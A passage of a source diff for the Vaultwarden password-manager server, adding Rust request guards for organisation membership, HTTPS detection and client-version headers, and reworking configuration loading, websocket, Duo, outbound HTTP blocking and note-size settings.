||||||
@@ -783,12 +842,12 @@ impl<'r> FromRequest<'r> for OwnerHeaders {
|
|||||||
|
|
||||||
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
||||||
if headers.org_user_type == UserOrgType::Owner {
|
if headers.is_confirmed_and_owner() {
|
||||||
Outcome::Success(Self {
|
Outcome::Success(Self {
|
||||||
host: headers.host,
|
|
||||||
device: headers.device,
|
device: headers.device,
|
||||||
user: headers.user,
|
user: headers.user,
|
||||||
ip: headers.ip,
|
ip: headers.ip,
|
||||||
|
org_id: headers.membership.org_uuid,
|
||||||
})
|
})
|
||||||
} else {
|
} else {
|
||||||
err_handler!("You need to be Owner to call this endpoint")
|
err_handler!("You need to be Owner to call this endpoint")
|
||||||
@@ -796,10 +855,48 @@ impl<'r> FromRequest<'r> for OwnerHeaders {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub struct OrgMemberHeaders {
|
||||||
|
pub host: String,
|
||||||
|
pub device: Device,
|
||||||
|
pub user: User,
|
||||||
|
pub membership: Membership,
|
||||||
|
pub ip: ClientIp,
|
||||||
|
}
|
||||||
|
|
||||||
|
#[rocket::async_trait]
|
||||||
|
impl<'r> FromRequest<'r> for OrgMemberHeaders {
|
||||||
|
type Error = &'static str;
|
||||||
|
|
||||||
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
|
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
||||||
|
if headers.is_member() {
|
||||||
|
Outcome::Success(Self {
|
||||||
|
host: headers.host,
|
||||||
|
device: headers.device,
|
||||||
|
user: headers.user,
|
||||||
|
membership: headers.membership,
|
||||||
|
ip: headers.ip,
|
||||||
|
})
|
||||||
|
} else {
|
||||||
|
err_handler!("You need to be a Member of the Organization to call this endpoint")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
impl From<OrgMemberHeaders> for Headers {
|
||||||
|
fn from(h: OrgMemberHeaders) -> Headers {
|
||||||
|
Headers {
|
||||||
|
host: h.host,
|
||||||
|
device: h.device,
|
||||||
|
user: h.user,
|
||||||
|
ip: h.ip,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
//
|
//
|
||||||
// Client IP address detection
|
// Client IP address detection
|
||||||
//
|
//
|
||||||
use std::net::IpAddr;
|
|
||||||
|
|
||||||
pub struct ClientIp {
|
pub struct ClientIp {
|
||||||
pub ip: IpAddr,
|
pub ip: IpAddr,
|
||||||
@@ -817,7 +914,7 @@ impl<'r> FromRequest<'r> for ClientIp {
|
|||||||
None => ip,
|
None => ip,
|
||||||
}
|
}
|
||||||
.parse()
|
.parse()
|
||||||
.map_err(|_| warn!("'{}' header is malformed: {}", CONFIG.ip_header(), ip))
|
.map_err(|_| warn!("'{}' header is malformed: {ip}", CONFIG.ip_header()))
|
||||||
.ok()
|
.ok()
|
||||||
})
|
})
|
||||||
} else {
|
} else {
|
||||||
@@ -832,6 +929,35 @@ impl<'r> FromRequest<'r> for ClientIp {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub struct Secure {
|
||||||
|
pub https: bool,
|
||||||
|
}
|
||||||
|
|
||||||
|
#[rocket::async_trait]
|
||||||
|
impl<'r> FromRequest<'r> for Secure {
|
||||||
|
type Error = ();
|
||||||
|
|
||||||
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
|
let headers = request.headers();
|
||||||
|
|
||||||
|
// Try to guess from the headers
|
||||||
|
let protocol = match headers.get_one("X-Forwarded-Proto") {
|
||||||
|
Some(proto) => proto,
|
||||||
|
None => {
|
||||||
|
if env::var("ROCKET_TLS").is_ok() {
|
||||||
|
"https"
|
||||||
|
} else {
|
||||||
|
"http"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
Outcome::Success(Secure {
|
||||||
|
https: protocol == "https",
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
pub struct WsAccessTokenHeader {
|
pub struct WsAccessTokenHeader {
|
||||||
pub access_token: Option<String>,
|
pub access_token: Option<String>,
|
||||||
}
|
}
|
||||||
@@ -854,3 +980,24 @@ impl<'r> FromRequest<'r> for WsAccessTokenHeader {
|
|||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub struct ClientVersion(pub semver::Version);
|
||||||
|
|
||||||
|
#[rocket::async_trait]
|
||||||
|
impl<'r> FromRequest<'r> for ClientVersion {
|
||||||
|
type Error = &'static str;
|
||||||
|
|
||||||
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
|
let headers = request.headers();
|
||||||
|
|
||||||
|
let Some(version) = headers.get_one("Bitwarden-Client-Version") else {
|
||||||
|
err_handler!("No Bitwarden-Client-Version header provided")
|
||||||
|
};
|
||||||
|
|
||||||
|
let Ok(version) = semver::Version::parse(version) else {
|
||||||
|
err_handler!("Invalid Bitwarden-Client-Version header provided")
|
||||||
|
};
|
||||||
|
|
||||||
|
Outcome::Success(ClientVersion(version))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
497
src/config.rs
497
src/config.rs
@@ -1,6 +1,11 @@
|
|||||||
use std::env::consts::EXE_SUFFIX;
|
use std::{
|
||||||
use std::process::exit;
|
env::consts::EXE_SUFFIX,
|
||||||
use std::sync::RwLock;
|
process::exit,
|
||||||
|
sync::{
|
||||||
|
atomic::{AtomicBool, Ordering},
|
||||||
|
LazyLock, RwLock,
|
||||||
|
},
|
||||||
|
};
|
||||||
|
|
||||||
use job_scheduler_ng::Schedule;
|
use job_scheduler_ng::Schedule;
|
||||||
use once_cell::sync::Lazy;
|
use once_cell::sync::Lazy;
|
||||||
@@ -9,7 +14,7 @@ use reqwest::Url;
|
|||||||
use crate::{
|
use crate::{
|
||||||
db::DbConnType,
|
db::DbConnType,
|
||||||
error::Error,
|
error::Error,
|
||||||
util::{get_env, get_env_bool, parse_experimental_client_feature_flags},
|
util::{get_env, get_env_bool, get_web_vault_version, is_valid_email, parse_experimental_client_feature_flags},
|
||||||
};
|
};
|
||||||
|
|
||||||
static CONFIG_FILE: Lazy<String> = Lazy::new(|| {
|
static CONFIG_FILE: Lazy<String> = Lazy::new(|| {
|
||||||
@@ -17,8 +22,32 @@ static CONFIG_FILE: Lazy<String> = Lazy::new(|| {
|
|||||||
get_env("CONFIG_FILE").unwrap_or_else(|| format!("{data_folder}/config.json"))
|
get_env("CONFIG_FILE").unwrap_or_else(|| format!("{data_folder}/config.json"))
|
||||||
});
|
});
|
||||||
|
|
||||||
|
static CONFIG_FILE_PARENT_DIR: LazyLock<String> = LazyLock::new(|| {
|
||||||
|
let path = std::path::PathBuf::from(&*CONFIG_FILE);
|
||||||
|
path.parent().unwrap_or(std::path::Path::new("data")).to_str().unwrap_or("data").to_string()
|
||||||
|
});
|
||||||
|
|
||||||
|
static CONFIG_FILENAME: LazyLock<String> = LazyLock::new(|| {
|
||||||
|
let path = std::path::PathBuf::from(&*CONFIG_FILE);
|
||||||
|
path.file_name().unwrap_or(std::ffi::OsStr::new("config.json")).to_str().unwrap_or("config.json").to_string()
|
||||||
|
});
|
||||||
|
|
||||||
|
pub static SKIP_CONFIG_VALIDATION: AtomicBool = AtomicBool::new(false);
|
||||||
|
|
||||||
pub static CONFIG: Lazy<Config> = Lazy::new(|| {
|
pub static CONFIG: Lazy<Config> = Lazy::new(|| {
|
||||||
Config::load().unwrap_or_else(|e| {
|
std::thread::spawn(|| {
|
||||||
|
let rt = tokio::runtime::Builder::new_current_thread().enable_all().build().unwrap_or_else(|e| {
|
||||||
|
println!("Error loading config:\n {e:?}\n");
|
||||||
|
exit(12)
|
||||||
|
});
|
||||||
|
|
||||||
|
rt.block_on(Config::load()).unwrap_or_else(|e| {
|
||||||
|
println!("Error loading config:\n {e:?}\n");
|
||||||
|
exit(12)
|
||||||
|
})
|
||||||
|
})
|
||||||
|
.join()
|
||||||
|
.unwrap_or_else(|e| {
|
||||||
println!("Error loading config:\n {e:?}\n");
|
println!("Error loading config:\n {e:?}\n");
|
||||||
exit(12)
|
exit(12)
|
||||||
})
|
})
|
||||||
@@ -39,7 +68,6 @@ macro_rules! make_config {
|
|||||||
|
|
||||||
struct Inner {
|
struct Inner {
|
||||||
rocket_shutdown_handle: Option<rocket::Shutdown>,
|
rocket_shutdown_handle: Option<rocket::Shutdown>,
|
||||||
ws_shutdown_handle: Option<tokio::sync::oneshot::Sender<()>>,
|
|
||||||
|
|
||||||
templates: Handlebars<'static>,
|
templates: Handlebars<'static>,
|
||||||
config: ConfigItems,
|
config: ConfigItems,
|
||||||
@@ -98,16 +126,25 @@ macro_rules! make_config {
|
|||||||
|
|
||||||
let mut builder = ConfigBuilder::default();
|
let mut builder = ConfigBuilder::default();
|
||||||
$($(
|
$($(
|
||||||
builder.$name = make_config! { @getenv paste::paste!(stringify!([<$name:upper>])), $ty };
|
builder.$name = make_config! { @getenv pastey::paste!(stringify!([<$name:upper>])), $ty };
|
||||||
)+)+
|
)+)+
|
||||||
|
|
||||||
builder
|
builder
|
||||||
}
|
}
|
||||||
|
|
||||||
fn from_file(path: &str) -> Result<Self, Error> {
|
async fn from_file() -> Result<Self, Error> {
|
||||||
let config_str = std::fs::read_to_string(path)?;
|
let operator = opendal_operator_for_path(&CONFIG_FILE_PARENT_DIR)?;
|
||||||
println!("[INFO] Using saved config from `{path}` for configuration.\n");
|
let config_bytes = operator.read(&CONFIG_FILENAME).await?;
|
||||||
serde_json::from_str(&config_str).map_err(Into::into)
|
println!("[INFO] Using saved config from `{}` for configuration.\n", *CONFIG_FILE);
|
||||||
|
serde_json::from_slice(&config_bytes.to_vec()).map_err(Into::into)
|
||||||
|
}
|
||||||
|
|
||||||
|
fn clear_non_editable(&mut self) {
|
||||||
|
$($(
|
||||||
|
if !$editable {
|
||||||
|
self.$name = None;
|
||||||
|
}
|
||||||
|
)+)+
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Merges the values of both builders into a new builder.
|
/// Merges the values of both builders into a new builder.
|
||||||
@@ -119,7 +156,7 @@ macro_rules! make_config {
|
|||||||
builder.$name = v.clone();
|
builder.$name = v.clone();
|
||||||
|
|
||||||
if self.$name.is_some() {
|
if self.$name.is_some() {
|
||||||
overrides.push(paste::paste!(stringify!([<$name:upper>])).into());
|
overrides.push(pastey::paste!(stringify!([<$name:upper>])).into());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
)+)+
|
)+)+
|
||||||
@@ -147,6 +184,12 @@ macro_rules! make_config {
|
|||||||
config.signups_domains_whitelist = config.signups_domains_whitelist.trim().to_lowercase();
|
config.signups_domains_whitelist = config.signups_domains_whitelist.trim().to_lowercase();
|
||||||
config.org_creation_users = config.org_creation_users.trim().to_lowercase();
|
config.org_creation_users = config.org_creation_users.trim().to_lowercase();
|
||||||
|
|
||||||
|
|
||||||
|
// Copy the values from the deprecated flags to the new ones
|
||||||
|
if config.http_request_block_regex.is_none() {
|
||||||
|
config.http_request_block_regex = config.icon_blacklist_regex.clone();
|
||||||
|
}
|
||||||
|
|
||||||
config
|
config
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -211,7 +254,7 @@ macro_rules! make_config {
|
|||||||
element.insert("default".into(), serde_json::to_value(def.$name).unwrap());
|
element.insert("default".into(), serde_json::to_value(def.$name).unwrap());
|
||||||
element.insert("type".into(), (_get_form_type(stringify!($ty))).into());
|
element.insert("type".into(), (_get_form_type(stringify!($ty))).into());
|
||||||
element.insert("doc".into(), (_get_doc(concat!($($doc),+))).into());
|
element.insert("doc".into(), (_get_doc(concat!($($doc),+))).into());
|
||||||
element.insert("overridden".into(), (overridden.contains(&paste::paste!(stringify!([<$name:upper>])).into())).into());
|
element.insert("overridden".into(), (overridden.contains(&pastey::paste!(stringify!([<$name:upper>])).into())).into());
|
||||||
element
|
element
|
||||||
}),
|
}),
|
||||||
)+
|
)+
|
||||||
@@ -228,6 +271,7 @@ macro_rules! make_config {
|
|||||||
// Besides Pass, only String types will be masked via _privacy_mask.
|
// Besides Pass, only String types will be masked via _privacy_mask.
|
||||||
const PRIVACY_CONFIG: &[&str] = &[
|
const PRIVACY_CONFIG: &[&str] = &[
|
||||||
"allowed_iframe_ancestors",
|
"allowed_iframe_ancestors",
|
||||||
|
"allowed_connect_src",
|
||||||
"database_url",
|
"database_url",
|
||||||
"domain_origin",
|
"domain_origin",
|
||||||
"domain_path",
|
"domain_path",
|
||||||
@@ -238,6 +282,7 @@ macro_rules! make_config {
|
|||||||
"smtp_from",
|
"smtp_from",
|
||||||
"smtp_host",
|
"smtp_host",
|
||||||
"smtp_username",
|
"smtp_username",
|
||||||
|
"_smtp_img_src",
|
||||||
];
|
];
|
||||||
|
|
||||||
let cfg = {
|
let cfg = {
|
||||||
@@ -326,7 +371,7 @@ macro_rules! make_config {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}};
|
}};
|
||||||
( @build $value:expr, $config:expr, gen, $default_fn:expr ) => {{
|
( @build $value:expr, $config:expr, generated, $default_fn:expr ) => {{
|
||||||
let f: &dyn Fn(&ConfigItems) -> _ = &$default_fn;
|
let f: &dyn Fn(&ConfigItems) -> _ = &$default_fn;
|
||||||
f($config)
|
f($config)
|
||||||
}};
|
}};
|
||||||
@@ -344,38 +389,34 @@ macro_rules! make_config {
|
|||||||
// }
|
// }
|
||||||
//
|
//
|
||||||
// Where action applied when the value wasn't provided and can be:
|
// Where action applied when the value wasn't provided and can be:
|
||||||
// def: Use a default value
|
// def: Use a default value
|
||||||
// auto: Value is auto generated based on other values
|
// auto: Value is auto generated based on other values
|
||||||
// option: Value is optional
|
// option: Value is optional
|
||||||
// gen: Value is always autogenerated and it's original value ignored
|
// generated: Value is always autogenerated and it's original value ignored
|
||||||
make_config! {
|
make_config! {
|
||||||
folders {
|
folders {
|
||||||
/// Data folder |> Main data folder
|
/// Data folder |> Main data folder
|
||||||
data_folder: String, false, def, "data".to_string();
|
data_folder: String, false, def, "data".to_string();
|
||||||
/// Database URL
|
/// Database URL
|
||||||
database_url: String, false, auto, |c| format!("{}/{}", c.data_folder, "db.sqlite3");
|
database_url: String, false, auto, |c| format!("{}/db.sqlite3", c.data_folder);
|
||||||
/// Icon cache folder
|
/// Icon cache folder
|
||||||
icon_cache_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "icon_cache");
|
icon_cache_folder: String, false, auto, |c| format!("{}/icon_cache", c.data_folder);
|
||||||
/// Attachments folder
|
/// Attachments folder
|
||||||
attachments_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "attachments");
|
attachments_folder: String, false, auto, |c| format!("{}/attachments", c.data_folder);
|
||||||
/// Sends folder
|
/// Sends folder
|
||||||
sends_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "sends");
|
sends_folder: String, false, auto, |c| format!("{}/sends", c.data_folder);
|
||||||
/// Temp folder |> Used for storing temporary file uploads
|
/// Temp folder |> Used for storing temporary file uploads
|
||||||
tmp_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "tmp");
|
tmp_folder: String, false, auto, |c| format!("{}/tmp", c.data_folder);
|
||||||
/// Templates folder
|
/// Templates folder
|
||||||
templates_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "templates");
|
templates_folder: String, false, auto, |c| format!("{}/templates", c.data_folder);
|
||||||
/// Session JWT key
|
/// Session JWT key
|
||||||
rsa_key_filename: String, false, auto, |c| format!("{}/{}", c.data_folder, "rsa_key");
|
rsa_key_filename: String, false, auto, |c| format!("{}/rsa_key", c.data_folder);
|
||||||
/// Web vault folder
|
/// Web vault folder
|
||||||
web_vault_folder: String, false, def, "web-vault/".to_string();
|
web_vault_folder: String, false, def, "web-vault/".to_string();
|
||||||
},
|
},
|
||||||
ws {
|
ws {
|
||||||
/// Enable websocket notifications
|
/// Enable websocket notifications
|
||||||
websocket_enabled: bool, false, def, false;
|
enable_websocket: bool, false, def, true;
|
||||||
/// Websocket address
|
|
||||||
websocket_address: String, false, def, "0.0.0.0".to_string();
|
|
||||||
/// Websocket port
|
|
||||||
websocket_port: u16, false, def, 3012;
|
|
||||||
},
|
},
|
||||||
push {
|
push {
|
||||||
/// Enable push notifications
|
/// Enable push notifications
|
||||||
@@ -414,7 +455,9 @@ make_config! {
|
|||||||
/// Auth Request cleanup schedule |> Cron schedule of the job that cleans old auth requests from the auth request.
|
/// Auth Request cleanup schedule |> Cron schedule of the job that cleans old auth requests from the auth request.
|
||||||
/// Defaults to every minute. Set blank to disable this job.
|
/// Defaults to every minute. Set blank to disable this job.
|
||||||
auth_request_purge_schedule: String, false, def, "30 * * * * *".to_string();
|
auth_request_purge_schedule: String, false, def, "30 * * * * *".to_string();
|
||||||
|
/// Duo Auth context cleanup schedule |> Cron schedule of the job that cleans expired Duo contexts from the database. Does nothing if Duo MFA is disabled or set to use the legacy iframe prompt.
|
||||||
|
/// Defaults to once every minute. Set blank to disable this job.
|
||||||
|
duo_context_purge_schedule: String, false, def, "30 * * * * *".to_string();
|
||||||
},
|
},
|
||||||
|
|
||||||
/// General settings
|
/// General settings
|
||||||
@@ -464,7 +507,8 @@ make_config! {
|
|||||||
disable_icon_download: bool, true, def, false;
|
disable_icon_download: bool, true, def, false;
|
||||||
/// Allow new signups |> Controls whether new users can register. Users can be invited by the vaultwarden admin even if this is disabled
|
/// Allow new signups |> Controls whether new users can register. Users can be invited by the vaultwarden admin even if this is disabled
|
||||||
signups_allowed: bool, true, def, true;
|
signups_allowed: bool, true, def, true;
|
||||||
/// Require email verification on signups. This will prevent logins from succeeding until the address has been verified
|
/// Require email verification on signups. On new client versions, this will require verification at signup time. On older clients,
|
||||||
|
/// this will prevent logins from succeeding until the address has been verified
|
||||||
signups_verify: bool, true, def, false;
|
signups_verify: bool, true, def, false;
|
||||||
/// If signups require email verification, automatically re-send verification email if it hasn't been sent for a while (in seconds)
|
/// If signups require email verification, automatically re-send verification email if it hasn't been sent for a while (in seconds)
|
||||||
signups_verify_resend_time: u64, true, def, 3_600;
|
signups_verify_resend_time: u64, true, def, 3_600;
|
||||||
@@ -489,11 +533,11 @@ make_config! {
|
|||||||
/// Password iterations |> Number of server-side passwords hashing iterations for the password hash.
|
/// Password iterations |> Number of server-side passwords hashing iterations for the password hash.
|
||||||
/// The default for new users. If changed, it will be updated during login for existing users.
|
/// The default for new users. If changed, it will be updated during login for existing users.
|
||||||
password_iterations: i32, true, def, 600_000;
|
password_iterations: i32, true, def, 600_000;
|
||||||
/// Allow password hints |> Controls whether users can set password hints. This setting applies globally to all users.
|
/// Allow password hints |> Controls whether users can set or show password hints. This setting applies globally to all users.
|
||||||
password_hints_allowed: bool, true, def, true;
|
password_hints_allowed: bool, true, def, true;
|
||||||
/// Show password hint |> Controls whether a password hint should be shown directly in the web page
|
/// Show password hint (Know the risks!) |> Controls whether a password hint should be shown directly in the web page
|
||||||
/// if SMTP service is not configured. Not recommended for publicly-accessible instances as this
|
/// if SMTP service is not configured and password hints are allowed. Not recommended for publicly-accessible instances
|
||||||
/// provides unauthenticated access to potentially sensitive data.
|
/// because this provides unauthenticated access to potentially sensitive data.
|
||||||
show_password_hint: bool, true, def, false;
|
show_password_hint: bool, true, def, false;
|
||||||
|
|
||||||
/// Admin token/Argon2 PHC |> The plain text token or Argon2 PHC string used to authenticate in this very same page. Changing it here will not deauthorize the current session!
|
/// Admin token/Argon2 PHC |> The plain text token or Argon2 PHC string used to authenticate in this very same page. Changing it here will not deauthorize the current session!
|
||||||
@@ -512,7 +556,7 @@ make_config! {
|
|||||||
/// Set to the string "none" (without quotes), to disable any headers and just use the remote IP
|
/// Set to the string "none" (without quotes), to disable any headers and just use the remote IP
|
||||||
ip_header: String, true, def, "X-Real-IP".to_string();
|
ip_header: String, true, def, "X-Real-IP".to_string();
|
||||||
/// Internal IP header property, used to avoid recomputing each time
|
/// Internal IP header property, used to avoid recomputing each time
|
||||||
_ip_header_enabled: bool, false, gen, |c| &c.ip_header.trim().to_lowercase() != "none";
|
_ip_header_enabled: bool, false, generated, |c| &c.ip_header.trim().to_lowercase() != "none";
|
||||||
/// Icon service |> The predefined icon services are: internal, bitwarden, duckduckgo, google.
|
/// Icon service |> The predefined icon services are: internal, bitwarden, duckduckgo, google.
|
||||||
/// To specify a custom icon service, set a URL template with exactly one instance of `{}`,
|
/// To specify a custom icon service, set a URL template with exactly one instance of `{}`,
|
||||||
/// which is replaced with the domain. For example: `https://icon.example.com/domain/{}`.
|
/// which is replaced with the domain. For example: `https://icon.example.com/domain/{}`.
|
||||||
@@ -521,9 +565,9 @@ make_config! {
|
|||||||
/// corresponding icon at the external service.
|
/// corresponding icon at the external service.
|
||||||
icon_service: String, false, def, "internal".to_string();
|
icon_service: String, false, def, "internal".to_string();
|
||||||
/// _icon_service_url
|
/// _icon_service_url
|
||||||
_icon_service_url: String, false, gen, |c| generate_icon_service_url(&c.icon_service);
|
_icon_service_url: String, false, generated, |c| generate_icon_service_url(&c.icon_service);
|
||||||
/// _icon_service_csp
|
/// _icon_service_csp
|
||||||
_icon_service_csp: String, false, gen, |c| generate_icon_service_csp(&c.icon_service, &c._icon_service_url);
|
_icon_service_csp: String, false, generated, |c| generate_icon_service_csp(&c.icon_service, &c._icon_service_url);
|
||||||
/// Icon redirect code |> The HTTP status code to use for redirects to an external icon service.
|
/// Icon redirect code |> The HTTP status code to use for redirects to an external icon service.
|
||||||
/// The supported codes are 301 (legacy permanent), 302 (legacy temporary), 307 (temporary), and 308 (permanent).
|
/// The supported codes are 301 (legacy permanent), 302 (legacy temporary), 307 (temporary), and 308 (permanent).
|
||||||
/// Temporary redirects are useful while testing different icon services, but once a service
|
/// Temporary redirects are useful while testing different icon services, but once a service
|
||||||
@@ -536,12 +580,18 @@ make_config! {
|
|||||||
icon_cache_negttl: u64, true, def, 259_200;
|
icon_cache_negttl: u64, true, def, 259_200;
|
||||||
/// Icon download timeout |> Number of seconds when to stop attempting to download an icon.
|
/// Icon download timeout |> Number of seconds when to stop attempting to download an icon.
|
||||||
icon_download_timeout: u64, true, def, 10;
|
icon_download_timeout: u64, true, def, 10;
|
||||||
/// Icon blacklist Regex |> Any domains or IPs that match this regex won't be fetched by the icon service.
|
|
||||||
|
/// [Deprecated] Icon blacklist Regex |> Use `http_request_block_regex` instead
|
||||||
|
icon_blacklist_regex: String, false, option;
|
||||||
|
/// [Deprecated] Icon blacklist non global IPs |> Use `http_request_block_non_global_ips` instead
|
||||||
|
icon_blacklist_non_global_ips: bool, false, def, true;
|
||||||
|
|
||||||
|
/// Block HTTP domains/IPs by Regex |> Any domains or IPs that match this regex won't be fetched by the internal HTTP client.
|
||||||
/// Useful to hide other servers in the local network. Check the WIKI for more details
|
/// Useful to hide other servers in the local network. Check the WIKI for more details
|
||||||
icon_blacklist_regex: String, true, option;
|
http_request_block_regex: String, true, option;
|
||||||
/// Icon blacklist non global IPs |> Any IP which is not defined as a global IP will be blacklisted.
|
/// Block non global IPs |> Enabling this will cause the internal HTTP client to refuse to connect to any non global IP address.
|
||||||
/// Useful to secure your internal environment: See https://en.wikipedia.org/wiki/Reserved_IP_addresses for a list of IPs which it will block
|
/// Useful to secure your internal environment: See https://en.wikipedia.org/wiki/Reserved_IP_addresses for a list of IPs which it will block
|
||||||
icon_blacklist_non_global_ips: bool, true, def, true;
|
http_request_block_non_global_ips: bool, true, auto, |c| c.icon_blacklist_non_global_ips;
|
||||||
|
|
||||||
/// Disable Two-Factor remember |> Enabling this would force the users to use a second factor to login every time.
|
/// Disable Two-Factor remember |> Enabling this would force the users to use a second factor to login every time.
|
||||||
/// Note that the checkbox would still be present, but ignored.
|
/// Note that the checkbox would still be present, but ignored.
|
||||||
@@ -552,7 +602,7 @@ make_config! {
|
|||||||
authenticator_disable_time_drift: bool, true, def, false;
|
authenticator_disable_time_drift: bool, true, def, false;
|
||||||
|
|
||||||
/// Customize the enabled feature flags on the clients |> This is a comma separated list of feature flags to enable.
|
/// Customize the enabled feature flags on the clients |> This is a comma separated list of feature flags to enable.
|
||||||
experimental_client_feature_flags: String, false, def, "fido2-vault-credentials".to_string();
|
experimental_client_feature_flags: String, false, def, String::new();
|
||||||
|
|
||||||
/// Require new device emails |> When a user logs in an email is required to be sent.
|
/// Require new device emails |> When a user logs in an email is required to be sent.
|
||||||
/// If sending the email fails the login attempt will fail.
|
/// If sending the email fails the login attempt will fail.
|
||||||
@@ -569,8 +619,9 @@ make_config! {
|
|||||||
use_syslog: bool, false, def, false;
|
use_syslog: bool, false, def, false;
|
||||||
/// Log file path
|
/// Log file path
|
||||||
log_file: String, false, option;
|
log_file: String, false, option;
|
||||||
/// Log level
|
/// Log level |> Valid values are "trace", "debug", "info", "warn", "error" and "off"
|
||||||
log_level: String, false, def, "Info".to_string();
|
/// For a specific module append it as a comma separated value "info,path::to::module=debug"
|
||||||
|
log_level: String, false, def, "info".to_string();
|
||||||
|
|
||||||
/// Enable DB WAL |> Turning this off might lead to worse performance, but might help if using vaultwarden on some exotic filesystems,
|
/// Enable DB WAL |> Turning this off might lead to worse performance, but might help if using vaultwarden on some exotic filesystems,
|
||||||
/// that do not support WAL. Please make sure you read project wiki on the topic before changing this setting.
|
/// that do not support WAL. Please make sure you read project wiki on the topic before changing this setting.
|
||||||
@@ -594,6 +645,9 @@ make_config! {
|
|||||||
/// Allowed iframe ancestors (Know the risks!) |> Allows other domains to embed the web vault into an iframe, useful for embedding into secure intranets
|
/// Allowed iframe ancestors (Know the risks!) |> Allows other domains to embed the web vault into an iframe, useful for embedding into secure intranets
|
||||||
allowed_iframe_ancestors: String, true, def, String::new();
|
allowed_iframe_ancestors: String, true, def, String::new();
|
||||||
|
|
||||||
|
/// Allowed connect-src (Know the risks!) |> Allows other domains to URLs which can be loaded using script interfaces like the Forwarded email alias feature
|
||||||
|
allowed_connect_src: String, true, def, String::new();
|
||||||
|
|
||||||
/// Seconds between login requests |> Number of seconds, on average, between login and 2FA requests from the same IP address before rate limiting kicks in
|
/// Seconds between login requests |> Number of seconds, on average, between login and 2FA requests from the same IP address before rate limiting kicks in
|
||||||
login_ratelimit_seconds: u64, false, def, 60;
|
login_ratelimit_seconds: u64, false, def, 60;
|
||||||
/// Max burst size for login requests |> Allow a burst of requests of up to this size, while maintaining the average indicated by `login_ratelimit_seconds`. Note that this applies to both the login and the 2FA, so it's recommended to allow a burst size of at least 2
|
/// Max burst size for login requests |> Allow a burst of requests of up to this size, while maintaining the average indicated by `login_ratelimit_seconds`. Note that this applies to both the login and the 2FA, so it's recommended to allow a burst size of at least 2
|
||||||
@@ -608,7 +662,18 @@ make_config! {
|
|||||||
admin_session_lifetime: i64, true, def, 20;
|
admin_session_lifetime: i64, true, def, 20;
|
||||||
|
|
||||||
/// Enable groups (BETA!) (Know the risks!) |> Enables groups support for organizations (Currently contains known issues!).
|
/// Enable groups (BETA!) (Know the risks!) |> Enables groups support for organizations (Currently contains known issues!).
|
||||||
org_groups_enabled: bool, false, def, false;
|
org_groups_enabled: bool, false, def, false;
|
||||||
|
|
||||||
|
/// Increase note size limit (Know the risks!) |> Sets the secure note size limit to 100_000 instead of the default 10_000.
|
||||||
|
/// WARNING: This could cause issues with clients. Also exports will not work on Bitwarden servers!
|
||||||
|
increase_note_size_limit: bool, true, def, false;
|
||||||
|
/// Generated max_note_size value to prevent if..else matching during every check
|
||||||
|
_max_note_size: usize, false, generated, |c| if c.increase_note_size_limit {100_000} else {10_000};
|
||||||
|
|
||||||
|
/// Enforce Single Org with Reset Password Policy |> Enforce that the Single Org policy is enabled before setting the Reset Password policy
|
||||||
|
/// Bitwarden enforces this by default. In Vaultwarden we encouraged to use multiple organizations because groups were not available.
|
||||||
|
/// Setting this to true will enforce the Single Org Policy to be enabled before you can enable the Reset Password policy.
|
||||||
|
enforce_single_org_with_reset_pw_policy: bool, false, def, false;
|
||||||
},
|
},
|
||||||
|
|
||||||
/// Yubikey settings
|
/// Yubikey settings
|
||||||
@@ -627,9 +692,11 @@ make_config! {
|
|||||||
duo: _enable_duo {
|
duo: _enable_duo {
|
||||||
/// Enabled
|
/// Enabled
|
||||||
_enable_duo: bool, true, def, true;
|
_enable_duo: bool, true, def, true;
|
||||||
/// Integration Key
|
/// Attempt to use deprecated iframe-based Traditional Prompt (Duo WebSDK 2)
|
||||||
|
duo_use_iframe: bool, false, def, false;
|
||||||
|
/// Client Id
|
||||||
duo_ikey: String, true, option;
|
duo_ikey: String, true, option;
|
||||||
/// Secret Key
|
/// Client Secret
|
||||||
duo_skey: Pass, true, option;
|
duo_skey: Pass, true, option;
|
||||||
/// Host
|
/// Host
|
||||||
duo_host: String, true, option;
|
duo_host: String, true, option;
|
||||||
@@ -644,7 +711,7 @@ make_config! {
|
|||||||
/// Use Sendmail |> Whether to send mail via the `sendmail` command
|
/// Use Sendmail |> Whether to send mail via the `sendmail` command
|
||||||
use_sendmail: bool, true, def, false;
|
use_sendmail: bool, true, def, false;
|
||||||
/// Sendmail Command |> Which sendmail command to use. The one found in the $PATH is used if not specified.
|
/// Sendmail Command |> Which sendmail command to use. The one found in the $PATH is used if not specified.
|
||||||
sendmail_command: String, true, option;
|
sendmail_command: String, false, option;
|
||||||
/// Host
|
/// Host
|
||||||
smtp_host: String, true, option;
|
smtp_host: String, true, option;
|
||||||
/// DEPRECATED smtp_ssl |> DEPRECATED - Please use SMTP_SECURITY
|
